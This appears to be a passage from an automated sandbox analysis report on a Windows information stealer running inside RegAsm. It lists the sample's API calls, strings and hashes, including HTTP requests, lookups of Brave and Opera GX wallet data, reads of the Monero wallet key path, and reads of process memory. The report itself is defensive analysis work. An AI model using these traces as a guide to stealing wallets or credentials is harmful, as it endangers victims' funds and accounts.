                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 004125C2
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 0041260A
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412795
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 00412822
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                                        • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                        • Opcode ID: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
                                                                                                                                                                                                                                        • Instruction ID: 9550d4ec349f4b6986a081b59543f2dd3f4438588e0d90f2a146262d3da5c6a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42C1F97590010ABFCF14EBA4DC91EDEB779AF04308F10815EF606A7282DE785788CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000004), ref: 00405AC0
                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405B1B
                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B4A
                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405B68
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405BB5
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405C0B
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C16
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405C20
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C2A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                        • API String ID: 1851261701-2509457195
                                                                                                                                                                                                                                        • Opcode ID: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
                                                                                                                                                                                                                                        • Instruction ID: 735b7a5339effcfe679080928f79d8b6525980b66e78d205f4b2077015f7fe3f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5661B171900219AFEB10DB94CC85FEFB7BDEB49704F50412AFA05B3281DB785E488BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404BEB
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404BF2
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C10
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 00404C26
                                                                                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404C51
                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00404C8B
                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404CB0
                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC2
                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404CE4
                                                                                                                                                                                                                                        • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404D54
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404D85
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404D8F
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00404D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                        • String ID: GET
                                                                                                                                                                                                                                        • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                        • Opcode ID: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
                                                                                                                                                                                                                                        • Instruction ID: e4d9ae68b354d6a53ac565d60b82c8593cc119c1dcfd6e68e0806bb865507591
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 486171B5A00219ABDB20DBA4DC45FEFB7B9EB49B10F504129FA05F72C0D7789904CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0145F700,?,00427C0C,?,0145F5E0,?,00427C08,00000000,?,?,?,00427BE8), ref: 0040D8F0
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040D90A
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,01461ED8), ref: 0040DADF
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F700), ref: 0040DB65
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,0145F5E0), ref: 0040DB7F
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 0040D090: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149
                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040E128
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040E137
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$FileFindlstrcatlstrlen$CloseCopyNext
                                                                                                                                                                                                                                        • String ID: Brave$F$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                        • API String ID: 704657350-2999302618
                                                                                                                                                                                                                                        • Opcode ID: 26299d0f3a1a31749b342d311c3fef528fe4aa723cc51249040bc28adbfb42a7
                                                                                                                                                                                                                                        • Instruction ID: a4fda989be0599bcb8e2ee1ea547159008252c3dc3d0dda2ce429139a213b2aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26299d0f3a1a31749b342d311c3fef528fe4aa723cc51249040bc28adbfb42a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE15270900249DADB14EBA5C955BDDBBB86F19304F5040AEF949B32C2DF781B4CCBA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00401DC4
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401DDA
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00401DE1
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,000000FF), ref: 00401DFE
                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(000000FF,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401E18
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
                                                                                                                                                                                                                                          • Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
                                                                                                                                                                                                                                          • Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00401E30
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00401E3D
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,.keys), ref: 00401E58
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00401FE0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                        • API String ID: 1905561306-218353709
                                                                                                                                                                                                                                        • Opcode ID: 0c252696e86d2124943117d3553765e15a66fa505ff4cc1cb518860de82bd35d
                                                                                                                                                                                                                                        • Instruction ID: b7190e78a0ece566d30ab40e821a7b759709afa39e85f3d509ad0c7fbb479532
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c252696e86d2124943117d3553765e15a66fa505ff4cc1cb518860de82bd35d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3817F71900249EACB14EBE5DC55BEDBBB8AF19308F54416EFA05B31C2DB781608CBB5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040FBAB
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FBD3
                                                                                                                                                                                                                                        • strlen.MSVCRT ref: 0040FBF4
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040FC30
                                                                                                                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC8B
                                                                                                                                                                                                                                        • strlen.MSVCRT ref: 0040FC98
                                                                                                                                                                                                                                        • strlen.MSVCRT ref: 0040FCDE
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040FD2A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • N0ZWFt, xrefs: 0040FCD9, 0040FCE9
                                                                                                                                                                                                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FC46, 0040FD43
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                        • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                        • Opcode ID: 1b115c04a358f66ae5b9cc5224adfa24bdf08062a89fa872ad74c5b1b014d4dc
                                                                                                                                                                                                                                        • Instruction ID: 21a460605aad31a862c186db400c004e6ee40eb0e1eca90a670e2fa51daa2b6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b115c04a358f66ae5b9cc5224adfa24bdf08062a89fa872ad74c5b1b014d4dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED612171D04208AAEB30DBA1DC42BEFBA78AF80314F14413EF915776C1D77C59888BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000004), ref: 00405AC0
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405B1B
                                                                                                                                                                                                                                          • Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00413F4E
                                                                                                                                                                                                                                          • Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00413F8F
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00413FAC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                        • String ID: 2HA$2HA$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                        • API String ID: 2440237315-3818902335
                                                                                                                                                                                                                                        • Opcode ID: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
                                                                                                                                                                                                                                        • Instruction ID: c74f93b79e1a96af938dd9262021b5edd6203cb7113eed4730bfd43c5734313e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E519134901249AACB11EBA5C9517DDBBA8AF19308F64407EF90573282DF7C5B48C7E6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
